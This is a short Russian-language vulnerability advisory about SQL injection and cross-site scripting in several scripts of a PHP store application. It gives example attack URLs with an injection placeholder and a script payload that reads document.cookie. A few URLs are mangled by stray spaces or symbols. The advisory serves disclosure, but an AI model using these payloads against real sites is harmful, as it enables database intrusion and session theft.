Опасность: Средняя

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные команды в базе
данных уязвимого приложения.

SQL-инъекция возможна в сценариях 'category.php', 'item.php',
'index.php', и 'search_result.php' из-за недостаточной
фильтрации входных данных в различных
параметрах. Удаленный пользователь может с
помощью специально сформированного URL
выполнить произвольные команды в базы
данных приложения.

Примеры:

http://[target]/store/category.php?sid=CDFE279AC2AD 08522DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/item.php?si d=CDFE279AC2AD085 22DF1CF9B46475132&id='SQL_INJECTION

http://[target]/store/index.php?sid=CDFE279AC2AD085 22DF1CF9B46475132〈='SQL_INJECTION

http://[target]/store/search_result.php?sid=&searchTop CategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC
2AD08522DF1CF9B46475132&currency=USD

http://[target]/store/search_result.php?sid=CDFE279AC2 AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION
&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD

Межсайтовый скриптинг возможен в
некоторых сценариях из-за недостаточной
фильтрации входных данных. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.

Пример:

http://[target]/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46 475132&lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/store/search_result.php?sid=CDFE279AC2AD08522DF1 CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script3E&searchQuery=&sid=CDFE279
AC2AD08522DF1CF9B46475132&currency=USD

Оставить мнение